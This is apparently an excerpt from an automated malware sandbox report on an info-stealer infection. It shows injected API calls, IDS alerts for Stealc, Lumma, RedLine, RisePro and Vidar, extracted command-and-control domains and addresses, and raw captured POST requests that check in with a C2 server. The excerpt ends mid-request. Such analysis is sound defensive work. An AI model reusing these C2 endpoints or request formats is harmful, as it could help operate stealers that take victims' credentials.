Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 22_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 22_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 22_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 22_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 22_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 22_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 22_2_004133C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Source: Network traffic Suricata IDS: 2054709 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (GET) : 192.168.2.6:49713 -> 62.133.61.172:80
Source: Network traffic Suricata IDS: 2054710 - Severity 1 - ET MALWARE PrivateLoader CnC Response : 62.133.61.172:80 -> 192.168.2.6:49713
Source: Network traffic Suricata IDS: 2054711 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (POST) : 192.168.2.6:49713 -> 62.133.61.172:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.6:53029 -> 147.45.47.36:30035
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.6:53029 -> 147.45.47.36:30035
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.6:53026
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.6:53026
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 147.45.47.36:30035 -> 192.168.2.6:53029
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2046266 - Severity 1 - ET MALWARE [ANY.RUN] RisePro TCP (Token) : 77.105.164.24:50505 -> 192.168.2.6:53031
Source: Network traffic Suricata IDS: 2046269 - Severity 1 - ET MALWARE [ANY.RUN] RisePro TCP (Activity) : 192.168.2.6:53031 -> 77.105.164.24:50505
Source: Network traffic Suricata IDS: 2049060 - Severity 1 - ET MALWARE RisePro TCP Heartbeat Packet : 192.168.2.6:53031 -> 77.105.164.24:50505
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 147.45.47.36:30035 -> 192.168.2.6:53029
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.6:56825 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.6:63594 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055482 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop) : 192.168.2.6:56028 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.6:58373 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055492 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (stamppreewntnq .shop) : 192.168.2.6:53035 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53036 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53039 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53038 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53041 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.6:54987 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.6:50145 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53044 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53045 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:53043 -> 147.45.68.138:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.6:53043
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.6:53043
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.6:51216 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.6:56102 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53052 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53053 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.6:53054 -> 45.132.206.251:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:53058 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.6:53055
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.6:53059
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.6:53055
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.6:53059
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:53041 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53041 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53036 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53038 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53036 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53035 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53035 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53038 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:53045 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53045 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53052 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53044 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53052 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53044 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:53039 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53039 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:53053 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53053 -> 172.67.146.35:443
Source: Malware configuration extractor URLs: http://185.215.113.100/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: traineiwnqo.shop
Source: Malware configuration extractor URLs: stagedchheiqwo.shop
Source: Malware configuration extractor URLs: condedqpwqm.shop
Source: Malware configuration extractor URLs: caffegclasiqwp.shop
Source: Malware configuration extractor URLs: evoliutwoqm.shop
Source: Malware configuration extractor URLs: stamppreewntnq.shop
Source: Malware configuration extractor URLs: locatedblsoqp.shop
Source: Malware configuration extractor URLs: millyscroqwp.shop
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199768374681
Source: Malware configuration extractor URLs: https://t.me/edm0d
Source: Malware configuration extractor URLs: 147.45.47.36:30035
Source: global traffic TCP traffic: 192.168.2.6:53029 -> 147.45.47.36:30035
Source: global traffic TCP traffic: 192.168.2.6:53031 -> 77.105.164.24:50505
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:06 GMTContent-Type: application/octet-streamContent-Length: 290344Last-Modified: Tue, 03 Sep 2024 12:56:21 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70775-46e28"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:06 GMTContent-Type: application/octet-streamContent-Length: 528896Last-Modified: Mon, 02 Sep 2024 09:53:28 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d58b18-81200"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:07 GMTContent-Type: application/octet-streamContent-Length: 3851776Last-Modified: Mon, 02 Sep 2024 11:18:17 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d59ef9-3ac600"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:07 GMTContent-Type: application/octet-streamContent-Length: 210984Last-Modified: Tue, 03 Sep 2024 12:56:19 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70773-33828"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:07 GMTContent-Type: application/octet-streamContent-Length: 320512Last-Modified: Tue, 03 Sep 2024 15:40:40 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d72df8-4e400"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:08 GMTContent-Type: application/octet-streamContent-Length: 14748160Last-Modified: Fri, 30 Aug 2024 12:15:51 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d1b7f7-e10a00"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:10 GMTContent-Type: application/octet-streamContent-Length: 8684256Last-Modified: Tue, 03 Sep 2024 13:26:30 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70e86-8482e0"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 04 Sep 2024 15:37:15 GMTContent-Type: application/octet-streamContent-Length: 1776640Last-Modified: Wed, 04 Sep 2024 13:30:25 GMTConnection: keep-aliveETag: "66d860f1-1b1c00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:16 GMTContent-Type: application/octet-streamContent-Length: 10902016Last-Modified: Thu, 22 Aug 2024 08:54:11 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66c6fcb3-a65a00"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:18 GMTContent-Type: application/octet-streamContent-Length: 1760552Last-Modified: Mon, 02 Sep 2024 19:06:59 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d60cd3-1add28"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:50 GMTContent-Type: application/octet-streamContent-Length: 290344Last-Modified: Tue, 03 Sep 2024 12:56:21 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70775-46e28"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:52 GMT Content-Type: application/octet-stream Content-Length: 342568 Last-Modified: Tue, 03 Sep 2024 12:56:26 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d7077a-53a28" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:01 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Fri, 24 Nov 2023 13:43:06 GMT Connection: keep-alive ETag: "6560a86a-258600" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:07 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-a7550" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:07 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-94750" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:08 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:09 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:09 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:10 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:19 GMT Content-Type: application/octet-stream Content-Length: 342568 Last-Modified: Tue, 03 Sep 2024 12:56:26 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d7077a-53a28" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:19 GMT Content-Type: application/octet-stream Content-Length: 342568 Last-Modified: Tue, 03 Sep 2024 12:56:26 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d7077a-53a28" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 46.8.231.109 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBA Host: 46.8.231.109 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------DGHIDAFCGIEHIEBFCFBA Content-Disposition: form-data; name="hwid" 62BC4D6489FB4109353171 ------DGHIDAFCGIEHIEBFCFBA Content-Disposition: form-data; name="build" default ------DGHIDAFCGIEHIEBFCFBA--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEHHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="message"browsers------HIDAKFIJJKJJJKEBKJEH--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGHHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="message"plugins------IJDGIIEBFCBAAAAKKEGH--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHIHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 